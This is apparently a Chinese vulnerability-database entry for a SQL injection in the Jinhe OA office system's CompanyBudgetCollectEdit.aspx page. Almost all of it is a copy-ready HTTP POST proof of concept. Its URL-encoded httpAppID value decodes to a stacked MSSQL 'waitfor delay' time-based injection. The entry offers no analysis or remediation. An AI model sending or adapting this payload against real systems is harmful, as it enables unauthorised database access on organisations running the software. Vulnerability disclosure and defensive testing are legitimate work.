金和OA CompanyBudgetCollectEdit.aspx SQL注入漏洞

日期: 2025-12-24 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和OA CompanyBudgetCollectEdit.aspx SQL注入漏洞

PoC代码

POST /c6/JHSoft.Web.CostControl/Collect/CompanyBudgetCollectEdit.aspx/ HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36

httpAppID=%31%3b%20%77%61%69%74%66%6f%72%20%64%65%6c%61%79%27%30%3a%30%3a%36%27%2d%2d&httpOID=1

相关漏洞推荐